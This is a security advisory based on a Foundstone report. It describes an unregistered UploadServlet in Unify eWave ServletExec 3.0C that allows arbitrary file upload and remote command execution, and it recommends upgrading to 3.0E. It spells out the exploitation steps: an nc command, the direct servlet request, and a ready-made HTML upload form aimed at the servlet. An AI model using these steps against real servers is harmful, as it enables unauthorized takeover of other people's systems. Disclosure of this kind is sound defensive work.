Vulnerability

    ServletExec

Affected

    Unify eWave ServletExec 3.0C

Description

    Following  is  based  on  a  Foundstone FS-103100-16-SRVX Security
    Advisory  by  Shreeraj  Shah,  Saumil  Shah  and  Stuart  McClure.
    Unify's  eWave  ServletExec  is  a  JSP  and a Java Servlet engine
    which is  used as  a plug-in  to popular  web servers like Apache,
    IIS, Netscape, etc.

    ServletExec has  a servlet  called "UploadServlet"  in its  server
    side classes.  UploadServlet,  when invokable, allows an  attacker
    to upload any file to any  directory on the server.  The  uploaded
    file  may  have  code  that  can  later be executed on the server,
    leading to remote command execution.

    ServletExec has com.unify.ewave.servletexec.UploadServlet residing
    in  its  server  side  classes.   Even  though this servlet is not
    registered, it can be invoked on the server side by the  following
    HTTP requests:

        nc 10.0.0.1 80
        GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0

    or

        http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet

    An attacker can  create an HTML  form on his  or her local  system
    to use this  servlet to upload  arbitrary files on  to the server.
    A sample of such a form is given below:

        <FORM METHOD=POST ENCTYPE='multipart/form-data' ACTION='http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet'>
        <P>
        Upload Directory:
        <INPUT TYPE=TEXT SIZE=35 Name=uploadDir>
        <P>
        File to Upload:
        <INPUT TYPE=FILE SIZE=35 NAME=File1>
        <P>
        <INPUT TYPE=SUBMIT NAME="Upload Files" VALUE="Upload Files">
        </FORM>

    Using  this  upload  form,  an  attacker  can  upload  a file, for
    example a JSP file, that can run arbitrary commands on the  server
    side.

Solution

    Upgrade to ServletExec version 3.0E, available at:

        http://www.servletexec.com/downloads/